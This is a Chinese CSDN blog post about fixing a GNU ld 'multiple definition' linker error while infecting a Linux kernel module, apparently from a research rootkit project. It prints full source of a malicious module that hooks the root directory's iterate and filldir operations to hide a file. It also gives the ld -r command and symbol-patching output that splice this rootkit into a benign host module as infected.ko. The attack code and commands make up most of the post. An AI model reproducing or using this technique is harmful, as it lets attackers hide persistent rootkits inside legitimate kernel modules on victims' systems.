使用GUN ld命令进行内核模块感染时报错

最新推荐文章于 2023-06-26 15:35:46 发布
最新推荐文章于 2023-06-26 15:35:46 发布
阅读量914 收藏 1
点赞数 1
分类专栏: Linux hook 文章标签: 内核 linux c++ 嵌入式
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42931917/article/details/108661948
版权

在研究novice大佬感染一个示例内核模块的时候,ld命令链接报错,先上大佬两个驱动文件

codeinj.c(宿主驱动模块)

# ifndef CPP
# include <linux/module.h>
# include <linux/kernel.h>
# endif // CPP

# include "zeroevil/zeroevil.h"

MODULE_LICENSE("GPL");

int
codeinj_init(void)
{
    fm_alert("codeinj: %s\n", "Greetings the World!");
    return 0;
}

void
codeinj_exit(void)
{
    fm_alert("codeinj: %s\n", "Farewell the World!");
    return;
}

module_init(codeinj_init);
module_exit(codeinj_exit);

fshid.c(恶意驱动模块,做文件隐藏,劫持codeinj模块)

# ifndef CPP
# include <linux/module.h>
# include <linux/kernel.h>
# include <linux/fs.h> // filp_open, filp_close.
# endif // CPP

# include "zeroevil/zeroevil.h"


MODULE_LICENSE("GPL");

# define ROOT_PATH "/"
# define SECRET_FILE "032416_525.mp4"

int
(*real_iterate)(struct file *filp, struct dir_context *ctx);
int
(*real_filldir)(struct dir_context *ctx,
                const char *name, int namlen,
                loff_t offset, u64 ino, unsigned d_type);

int
fake_iterate(struct file *filp, struct dir_context *ctx);
int
fake_filldir(struct dir_context *ctx, const char *name, int namlen,
             loff_t offset, u64 ino, unsigned d_type);

extern int
codeinj_init(void);
extern void
codeinj_exit(void);


int
fshid_init(void)
{
    codeinj_init();

    fm_alert("%s\n", "Greetings the World!");

    set_file_op(iterate, ROOT_PATH, fake_iterate, real_iterate);

    if (!real_iterate) {
        return -ENOENT;
    }

    return 0;
}


void
fshid_exit(void)
{
    codeinj_exit();

    if (real_iterate) {
        void *dummy;
        set_file_op(iterate, ROOT_PATH, real_iterate, dummy);
    }

    fm_alert("%s\n", "Farewell the World!");
    return;
}


/* module_init(fshid_init); */
/* module_exit(fshid_exit); */


int
fake_iterate(struct file *filp, struct dir_context *ctx)
{
    real_filldir = ctx->actor;
    *(filldir_t *)&ctx->actor = fake_filldir;

    return real_iterate(filp, ctx);
}


int
fake_filldir(struct dir_context *ctx, const char *name, int namlen,
             loff_t offset, u64 ino, unsigned d_type)
{
    if (strcmp(name, SECRET_FILE) == 0) {
        fm_alert("Hiding: %s", name);
        return 0;
    }

    /* pr_cont("%s ", name); */

    return real_filldir(ctx, name, namlen, offset, ino, d_type);
}

这个驱动主要做的就是隐藏test文件夹下的"032416_525.mp4"文件
在这里插入图片描述
在此之前先介绍ld命令,ld 命令是二进制工具集 GNU Binutils 的一员,是 GNU 链接器,用于将目标文件与库链接为可执行文件或库文件,-r,–relocatable 生成可重定位的输出(称为部分连接)。
分别make两个驱动之后,使用以下命令将编译出来的codeinjko和fshidko文件链接为infectied.ko。

ld -r codeinjko.ko fshid/fshidko.ko -o infected.ko

但是在链接过程中,这边报错了,报错如下:

curits@curits-virtual-machine:~/Desktop/research-rootkit-master/3-persistence/codeinj$ ld -r codeinjko.ko fshid/fshidko.ko -o infected.ko
fshid/fshidko.ko: In function `print_process_list':
(.text+0x3e0): multiple definition of `print_process_list'
codeinjko.ko:(.text+0x170): first defined here
fshid/fshidko.ko: In function `print_memory':
(.text+0xcf0): multiple definition of `print_memory'
codeinjko.ko:(.text+0xa80): first defined here
fshid/fshidko.ko: In function `cleanup_module':
(.text+0x1c0): multiple definition of `cleanup_module'
codeinjko.ko:(.text+0x30): first defined here
fshid/fshidko.ko: In function `get_sct_via_sys_close':
(.text+0x330): multiple definition of `get_sct_via_sys_close'
codeinjko.ko:(.text+0xc0): first defined here
fshid/fshidko.ko: In function `get_sct':
(.text+0x2f0): multiple definition of `get_sct'
codeinjko.ko:(.text+0x80): first defined here
fshid/fshidko.ko: In function `init_module':
(.text+0xa0): multiple definition of `init_module'
codeinjko.ko:(.text+0x0): first defined here
fshid/fshidko.ko: In function `get_lstar_sct':
(.text+0xa90): multiple definition of `get_lstar_sct'
codeinjko.ko:(.text+0x820): first defined here
fshid/fshidko.ko: In function `resume_inline_hook':
(.text+0xc00): multiple definition of `resume_inline_hook'
codeinjko.ko:(.text+0x990): first defined here
fshid/fshidko.ko: In function `set_lstar_sct':
(.text+0xac0): multiple definition of `set_lstar_sct'
codeinjko.ko:(.text+0x850): first defined here
fshid/fshidko.ko: In function `print_dents':
(.text+0x6a0): multiple definition of `print_dents'
codeinjko.ko:(.text+0x430): first defined here
fshid/fshidko.ko: In function `pause_inline_hook':
(.text+0xb90): multiple definition of `pause_inline_hook'
codeinjko.ko:(.text+0x920): first defined here
fshid/fshidko.ko: In function `disable_wp':
(.text+0x340): multiple definition of `disable_wp'
codeinjko.ko:(.text+0xd0): first defined here
fshid/fshidko.ko: In function `remove_dent64':
(.text+0x960): multiple definition of `remove_dent64'
codeinjko.ko:(.text+0x6f0): first defined here
fshid/fshidko.ko: In function `enable_wp':
(.text+0x390): multiple definition of `enable_wp'
codeinjko.ko:(.text+0x120): first defined here
fshid/fshidko.ko: In function `remove_dent':
(.text+0x880): multiple definition of `remove_dent'
codeinjko.ko:(.text+0x610): first defined here
fshid/fshidko.ko: In function `print_module_list':
(.text+0x580): multiple definition of `print_module_list'
codeinjko.ko:(.text+0x310): first defined here
fshid/fshidko.ko: In function `remove_inline_hook':
(.text+0x1020): multiple definition of `remove_inline_hook'
codeinjko.ko:(.text+0xdb0): first defined here
fshid/fshidko.ko: In function `phys_to_virt_kern':
(.text+0xb70): multiple definition of `phys_to_virt_kern'
codeinjko.ko:(.text+0x900): first defined here
fshid/fshidko.ko: In function `install_inline_hook':
(.text+0xea0): multiple definition of `install_inline_hook'
codeinjko.ko:(.text+0xc30): first defined here
fshid/fshidko.ko: In function `join_strings':
(.text+0xc70): multiple definition of `join_strings'
codeinjko.ko:(.text+0xa00): first defined here
fshid/fshidko.ko: In function `print_dents64':
(.text+0x790): multiple definition of `print_dents64'
codeinjko.ko:(.text+0x520): first defined here
fshid/fshidko.ko: In function `get_lstar_sct_addr':
(.text+0xa40): multiple definition of `get_lstar_sct_addr'
codeinjko.ko:(.text+0x7d0): first defined here
fshid/fshidko.ko: In function `print_ascii':
(.text+0x10e0): multiple definition of `print_ascii'

意思就是说,两个ko文件对以上函数都进行了定义,重复定义,因为两个ko文件在编译的时候都包含了头文件

# include "zeroevil/zeroevil.h"

这边的解决办法是修改宿主.c文件,不包含zoroevil.h这个文件就可以了,代码修改如下所示
codeinj.c

//# ifndef CPP
# include <linux/module.h>
# include <linux/kernel.h>
//# endif // CPP

//# include "zeroevil/zeroevil.h"


MODULE_LICENSE("GPL");


int
codeinj_init(void)
{	
	//只需要简单打印信息就可以
    printk("Greetings the World!");
    return 0;
}


void
codeinj_exit(void)
{
    printk("Farewell the World!");

    return;
}


module_init(codeinj_init);
module_exit(codeinj_exit);

Makefile:

CONFIG_MODULE_SIG=n

ifeq ($(KERNELRELEASE),)

ROOTS_DIR = /root/
#内核源码路径,不同环境可能会不一样,内核源码一定要先编译
KERNEL_DIR = /lib/modules/$(shell uname -r)/build
CUR_DIR = $(shell pwd)

all: 
        make -C $(KERNEL_DIR) M=$(CUR_DIR) modules
clean :
        make -C $(KERNEL_DIR) M=$(CUR_DIR) clean
else
#用于指定到底编译的是哪个代码--hello.c
obj-m += codeinj.o

endif

成功编译后,再执行ld命令不再报错,fshid 感染到codeinj.ko成功

curtis@curtis-virtual-machine:~/Desktop/research-rootkit-master/3-persistence/codeinj$ ./infect.sh 
WARNING: "codeinj_exit" [/home/curtis/Desktop/research-rootkit-master/3-persistence/codeinj/fshid/fshidko.ko] undefined!
WARNING: "codeinj_init" [/home/curtis/Desktop/research-rootkit-master/3-persistence/codeinj/fshid/fshidko.ko] undefined!
    57: 0000000000000020    25 FUNC    GLOBAL DEFAULT    2 cleanup_module
    63: 0000000000000000    27 FUNC    GLOBAL DEFAULT    2 init_module
    85: 0000000000000220   280 FUNC    GLOBAL DEFAULT    2 fshid_exit
    97: 00000000000000f0   295 FUNC    GLOBAL DEFAULT    2 fshid_init
Writing complete.
Writing complete.
    57: 0000000000000220    25 FUNC    GLOBAL DEFAULT    2 cleanup_module
    63: 00000000000000f0    27 FUNC    GLOBAL DEFAULT    2 init_module
    85: 0000000000000220   280 FUNC    GLOBAL DEFAULT    2 fshid_exit
    97: 00000000000000f0   295 FUNC    GLOBAL DEFAULT    2 fshid_init
Configure-Handler
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
老版本系统安装imagemagick中遇到multiple definition of `__pthread_cleanup_routine'这个问题的解决方法...
weixin_34362875的博客
01-17 90
参考网址: http://www.imagemagick.org/discourse-server/viewtopic.php?t=25866 这里最下面一个人提到 Re: Source : multiple definition of `__pthread_cleanup_routi Quote Postbydarlingm»2014-07-15T15:...
内核态下基于动态感染技术的应用程序执行保护(五 动态感染
09-25 62
源代码:http://download.csdn.net/detail/hitetoshi/3633188 绝影做尘,铁甲四方逐鹿而争。风起云涌,八面九锡更兼策马奔。南面独傲,铜雀二乔,欲休却报诏到。假节钺,赞拜不名,剑履入殿谁能?青梅煮酒,本初不数,惊起雷霆咋休。玺绶之册,即阼亦重,却累身三秋。观之沧海,星汉一粟,不道身成五彩。隔江叹:景升之子,豚犬之流。 扯远了,赶紧返回。今天这章...
Linux驱动入门(四)——构建第一个驱动程序
最新发布
m0_56145255的博客
06-26 1880
开发板以STM32MP157为例进行实验。万事开头难,写驱动程序也是一样,本章将构建第一个驱动程序。驱动程序和模块的关系非常密切,所以这里将详细讲解模块的相关知识。而模块编程成败与否的先决条件是要有统一的内核版本,所以这里将讲解怎样升级内核版本。最后为了提高程序员的编程效率,这里将介绍两种集成开发环境。
[问题解决] multiple definition of `***'
liqinzhe11的博客
11-20 8684
make发现问题如下: 我是把  pthread_mutex_t VT_Mutex;   这一句写在 init.h 里面。 解决办法: 把 pthread_mutex_t VT_Mutex;  写在init.c 里面,init.c include init.h 在init.h 里面写 extern pthread_mutex_t VT_Mutex;
ld命令 GUN连接器
01-09
很少单独使用ld命令对目标进行连接操作,通常都是使用gcc命令在编译后自动进行连接。 语法格式: ld [参数] 常用参数: -o 指定输出文件名 -e 指定程序的入口符号 参考实例 将文件&ldquo;/lib/linuxcool_1.o”与...
GUN ld中文使用手册
04-22
**GNU ld 中文使用手册** GNU ld 是一个强大的链接器,是GNU Binutils工具集的一部分,用于将编译器产生的目标文件(.o)合并成可执行文件或库。ld 能处理各种不同的输入格式,并生成多种类型的输出,包括ELF...
GUN+ld中文使用手册
06-07
GUN+ld中文使用手册》是一份专为程序员和系统管理员编写的详细教程,它深入浅出地介绍了如何在GNU环境下使用ld链接器来构建和管理程序。这份手册不仅覆盖了ld的基本用法,还涵盖了高级特性,是学习和掌握ld链接器...
GUN-LD中文使用说明
05-11
链接器ld各种命令详细讲解,能够帮助你很好的理解Linux编译,链接各种疑难问题
gcc命令 GUN C/C++编译器
01-09
gcc命令使用GNU推出的基于C/C++的编译器,是开放源代码领域应用最广泛的编译器,具有功能强大,编译代码支持性能优化等特点。 现在很多程序员都应用gcc,目前gcc可以用来编译C/C++、FORTRAN、JAVA、OBJC、ADA等语言...
linux设备驱动程序(第三版) 示例
09-01
随书代码,最经典的linux设备驱动程序讲解的书籍的示例程序、
Linux驱动实例
11-16
Linux设备驱动程序第三版2.chm
linux驱动程序
12-10
linux驱动程序Linux下驱动模板的要素,以及Linux上应用程序到驱动的执行过程
Linux设备驱动程序(中文版第三版)
01-25
Linux设备驱动程序(中文版第三版)
Linux设备驱动程序(三)——字符驱动
明天你好的博客
06-23 1914
本章的目的是编写一个完整的字符设备驱动,我们开发一个字符驱动是因为这一类适合大部分简单硬件设备,字符驱动也比块驱动易于理解。贯穿本章,我们展示从一个真实设备驱动提取的代码片段:scull区域装载的简单字符工具。scull 是一个字符驱动,操作一块内存区域好像它是一个设备,在本章,因为 scull 的这个特殊之处,我们可互换地使用“设备”这个词和"scull 使用的内存区"。scull 的优势在于它不依赖硬件,scull 只是操作一些从内核分配的内存。
深入探讨Linux驱动开发:驱动介绍与hello驱动实例
qq_52836452的博客
04-19 2797
通过之前对于IGKBoard开发板的应用层的学习与开发,现在已经进入了对Linux驱动的学习,对于Linux驱动的学习知识我也会在学习结束,总结汇总后发到我的博客当中,大家可以用作参考。对于Linux的程序开发分为应用程序开发与内核级驱动程序开发,分别对应Linux的用户态和内核态,用户态和内核态之间的交互主要通过系统调用(system call)来实现。系统调用是一种特殊的函数调用,用于在用户态的应用程序中请求操作系统内核执行特权操作,例如访问硬件设备、创建进程、进行文件操作等。
LINUX 驱动例程总结
qq_31057589的博客
08-17 382
linux驱动
问题解决: multiple definition of XXX
热门推荐
liyuefeilong的专栏
03-05 7万+
在编译程序的时候,遇到了一个问题,花点时间记录一下:在Qt中创建一个类后,一般是先在.h文件中声明变量与函数,然后在对应的.cpp文件中对各个函数进行定义,这在往常使用中没有任何问题,今天在使用Qt时,在各.cpp源文件编译时出现了许多multiple definition of XXX的误:搜寻了网上一些资料,解决了multiple definition of 的问题。
GNU连接器ld使用详解
"ld中文使用手册完全版,详细介绍了GNU连接器ld的2.14版本,涵盖使用方法、概述、链接脚本以及命令行选项等内容。ld用于将目标文件和档案...通过阅读这份中文版的ld使用手册,开发者可以获得详尽的指引,提升工作效率。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值